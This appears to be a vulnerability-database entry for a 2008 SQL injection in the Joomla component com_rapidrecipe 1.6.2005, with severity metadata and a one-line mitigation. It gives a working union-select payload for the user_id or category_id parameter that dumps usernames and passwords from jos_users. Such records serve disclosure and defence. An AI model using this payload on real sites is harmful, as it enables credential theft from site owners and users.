vendor:
rapidrecipe
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: rapidrecipe
Affected Version From: 1.6.2005
Affected Version To: 1.6.2005
Patch Exists: NO
Related CWE: N/A
CPE: a:konstantinos_kokkorogiannis:rapidrecipe
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Joomla SQL Injection (com_rapidrecipe)
An attacker can exploit this vulnerability by adding an exploit after the user_id or category_id parameter. The exploit is -9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
Mitigation:
Ensure that user input is properly sanitized and validated before being used in SQL queries.